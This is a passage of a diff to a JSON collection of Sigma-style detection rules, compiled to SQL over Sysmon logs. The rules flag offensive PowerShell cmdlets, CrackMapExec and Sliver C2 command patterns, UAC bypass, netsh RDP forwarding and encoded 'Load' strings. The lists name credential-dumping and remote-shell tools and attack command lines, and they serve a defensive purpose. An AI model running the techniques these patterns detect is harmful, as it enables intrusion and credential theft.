CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Obfuscated IP Via CLI", - "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", + "attack.defense_evasion", "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "status": "test", + "description": "Detects commands that temporarily turn off Volume Snapshots", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", - "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "status": "test", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "description": "Detects the import of '.reg' files from suspicious paths 